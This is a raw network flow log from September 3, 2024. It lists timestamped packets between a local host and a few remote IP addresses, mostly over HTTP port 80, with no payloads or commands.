Sep 3, 2024 17:13:23.311172962 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.311172962 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.311227083 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.311227083 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.311422110 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.311433077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.311444044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.311527967 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.311539888 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.311556101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.311566114 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.311568975 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.311578035 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.311606884 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.311606884 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.311707020 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.311717987 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.311728001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.311738968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.311747074 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.311798096 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.312417984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.312428951 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.312442064 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.312448978 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.312453032 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.312493086 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.312525988 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.312536001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.312546968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.312565088 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.312577009 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.312643051 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.312654018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.312664986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.312675953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.312681913 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.312686920 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.312691927 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.312721014 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.312835932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.312846899 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.312856913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.312866926 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.312901020 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.312933922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.312944889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.312959909 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.312988043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.312999964 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313010931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313034058 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.313071966 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.313071966 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.313178062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313189030 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313199043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313209057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313220024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313230038 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313230991 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.313241959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313256025 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.313280106 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.313462019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313472986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313483000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313493013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313503027 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313513041 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313544989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.313544989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.313566923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.313566923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.313608885 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313620090 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313630104 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313640118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313651085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313663006 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313673973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313688040 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.313688040 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.313729048 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.313760042 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.313942909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313954115 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313963890 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313976049 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313986063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.313997030 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.314006090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.314006090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.314009905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.314022064 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.314023018 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.314034939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.314044952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.314059019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.314064980 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.314101934 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.314126968 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.314203978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.314217091 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.314251900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.314254999 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.314385891 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.314552069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.314620018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.314631939 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.314642906 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.314649105 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.314665079 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.314706087 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.314832926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.314845085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.314858913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.314881086 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.314903021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.314903021 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.314915895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.314927101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.314941883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.314981937 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.314981937 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.315002918 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.315057039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.315068007 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.315078974 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.315097094 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.315108061 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.315124035 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.315138102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.315144062 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.315144062 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.315155983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.315188885 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.315205097 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.315260887 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.315273046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.315284014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.315296888 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.315316916 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.315362930 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.315392971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.315403938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.315413952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.315459013 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.315459013 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.316775084 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:23.317236900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.317255974 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.317267895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.317313910 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.317313910 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.317320108 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.317332983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.317385912 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.317503929 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.317517042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.317578077 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.317578077 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.321825981 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:23.351293087 CEST	80	49736	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:23.353792906 CEST	49736	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:23.410206079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.410222054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.410233021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.410283089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.410294056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.410305023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.410311937 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.410321951 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.410321951 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.410321951 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.410367966 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.410547972 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.410598040 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.410609007 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.410665989 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.410748959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.410759926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.410768986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.410778999 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.410804987 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.410821915 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.410932064 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.410940886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.410973072 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.410985947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.410998106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.411027908 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.411046028 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.411056042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.411067009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.411072016 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.411077976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.411137104 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.411462069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.411498070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.411509037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.411533117 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.411546946 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.411628962 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.411639929 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.411649942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.411662102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.411680937 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.411700010 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.412451029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.412461996 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.412472010 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.412501097 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.412509918 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.412825108 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.412837029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.412853956 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.412866116 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.412869930 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.412878036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.412890911 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.412903070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.412904024 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.412904024 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.412914991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.412925959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.412935972 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.412947893 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.412959099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.412967920 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.412967920 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.412967920 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.412992954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.412995100 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.413006067 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413023949 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413034916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413044930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413048983 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.413055897 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413063049 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.413074970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413086891 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413096905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413100004 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.413108110 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413120031 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413130999 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413141012 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413140059 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.413140059 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.413141012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.413153887 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413177967 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.413211107 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.413496017 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413506985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413517952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413536072 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.413574934 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.413598061 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413609028 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413614988 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413624048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413635015 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413657904 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.413657904 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.413722038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.413883924 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413896084 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413904905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413918972 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413933992 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413940907 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.413944960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413957119 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413963079 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.413963079 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.413969040 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413981915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.413997889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.414016008 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.414016008 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.414043903 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.414144039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.414155960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.414166927 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.414191008 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.414191008 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.414233923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.414268970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.414279938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.414330006 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.414350986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.414362907 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.414376020 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.414391041 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.414410114 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.414410114 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.414438963 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.414520979 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.414686918 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.414859056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.414870024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.414880991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.414908886 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.414932013 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.414968967 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.414980888 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.414990902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.415004015 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.415030003 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.415074110 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.415235043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.415247917 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.415257931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.415267944 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.415278912 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.415290117 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.415298939 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.415298939 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.415302038 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.415314913 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.415323973 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.415349007 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.415375948 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.415376902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.415389061 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.415400028 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.415410042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.415421009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:23.415424109 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:23.415432930 CEST	80	49730	52.212.52.84	192.168.2.8
